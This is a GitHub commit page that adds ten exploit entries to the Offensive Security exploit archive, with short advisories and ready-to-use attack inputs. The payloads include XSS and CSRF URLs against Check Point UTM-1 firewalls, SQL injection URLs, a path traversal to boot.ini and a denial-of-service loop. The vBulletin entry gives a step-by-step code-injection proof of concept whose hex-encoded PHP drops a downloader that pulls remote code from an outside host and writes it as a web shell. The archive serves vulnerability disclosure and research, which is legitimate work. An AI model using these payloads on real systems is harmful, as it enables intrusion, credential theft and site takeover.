Skip to content

Commit

Permalink
Update: 2015-03-04
Browse files Browse the repository at this point in the history 
10 new exploits
  • Loading branch information
Offensive Security committed Mar 4, 2015
1 parent 9eca9a0 commit ce06069
Show file tree
Hide file tree
Showing 11 changed files with 214 additions and 0 deletions.
10 changes: 10 additions & 0 deletions files.csv
View file
Original file line number Diff line number Diff line change
Expand Up @@ -32638,6 +32638,7 @@ id,file,description,date,author,platform,type,port
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0
36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 'resolute.php' Information Disclosure Vulnerability",2011-10-07,"cr4wl3r ",php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Vulnerability",2011-10-09,"BHG Security Center",php,webapps,0
Expand All @@ -32654,3 +32655,12 @@ id,file,description,date,author,platform,type,port
36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0
36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0
36236,platforms/php/webapps/36236.txt,"Xenon 'id' Parameter Multiple SQL Injection Vulnerabilities",2011-10-14,m3rciL3Ss,php,webapps,0
36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 'index.php' Cross Site Scripting Vulnerability",2011-10-17,indoushka,php,webapps,0
36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0
36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
75 changes: 75 additions & 0 deletions platforms/hardware/remote/36239.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,75 @@
source: http://www.securityfocus.com/bid/50189/info

Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including:

1. Multiple cross-site scripting vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. Multiple cross-site request forgery vulnerabilities
4. Multiple URI-redirection vulnerabilities
5. An information-disclosure vulnerability

An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session.

Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable.

Tested on versions 7.5.48x, 8.1.46x and 8.2.2x.


1) The following demonstrate the reflective XSS flaws:-

a) The Ufp.html page is vulnerable to XSS via the url parameter
It works by submitting a malicious url parameter to the ufp.html page
http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1

This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x.

b) The login page is also vulnerable to an XSS via the malicious session cookie
It works by submitting a malicious session cookie to the login page
Cookie: session="><script>alert(1)</script>

c) An authenticated XSS exists within the diagnostics command
http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);//
(this might need to be submitted twice)


2) The following demonstrate the persistent XSS flaws and XSRF flaws:-

a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack
when the page is displayed.

First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out.
http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1

b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access
point being at risk.

First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on

Firewall users then visiting the Wi-Fi landing page will then have the attack carried out.
http://www.example.com/pub/hotspot.html?swpreview=1


3) The following demonstrate the (authenticated) offsite redirection flaws:-

a) Enter the following URL to redirect
http://www.example.com/12?swcaller=http://www.procheckup.com

b) Enter the following URL and then press back button.
http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com

4) The following demonstrate the Information disclosure flaws (no authentication needed)
It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the
MAC addresses to unauthenticated users.

a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x
Just requesting http:// www.example.com/pub/test.html is sufficient

b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote
bypassed this check
https:// www.example.com/pub/test.html?url="
9 changes: 9 additions & 0 deletions platforms/multiple/dos/36234.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50108/info

G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability.

Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application.

G-WAN 2.10.6 is vulnerable; other versions may also be affected.

while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n'
7 changes: 7 additions & 0 deletions platforms/multiple/remote/36238.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50168/info

Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability.

Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device.

http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm
43 changes: 43 additions & 0 deletions platforms/php/webapps/36232.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
#################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
#################################################################################################################
Remote Code Injection:
+++++++++++++++++++++++++
1) You Must Register In The vBulletin http://server/register.php example:[blackhat]

2) go to your user profile example: [http://server/members/blackhat.html]

3) post something in visitor message and record post data with live http header

[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]

[Now post this with hackbar:]

URL: http://server/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And referrer data:]
PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]

[Example referrer data:] > upload downloader.php and s.php
PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
"downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}]

5- Open hackbar and tamper it with taper data:
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]

and submit request.

################################################################################################################
13 changes: 13 additions & 0 deletions platforms/php/webapps/36233.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/50096/info

The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
11 changes: 11 additions & 0 deletions platforms/php/webapps/36236.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50141/info

Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables

http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273

http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
9 changes: 9 additions & 0 deletions platforms/php/webapps/36237.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50167/info

asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected.

http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt>
21 changes: 21 additions & 0 deletions platforms/php/webapps/36240.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/50195/info

Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

XSS:

http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script>

SQL Injection:

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]

http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]
7 changes: 7 additions & 0 deletions platforms/windows/dos/36211.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49997/info

Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.

http://www.exploit-db.com/sploits/36211.zip
9 changes: 9 additions & 0 deletions platforms/windows/remote/36235.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50133/info

PROMOTIC is prone to multiple security vulnerabilities.

Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information.

PROMOTIC 8.1.3 is vulnerable; other versions may also be affected.

http://www.example.com/webdir/..\..\..\..\..\boot.ini

0 comments on commit ce06069

Please sign in to comment.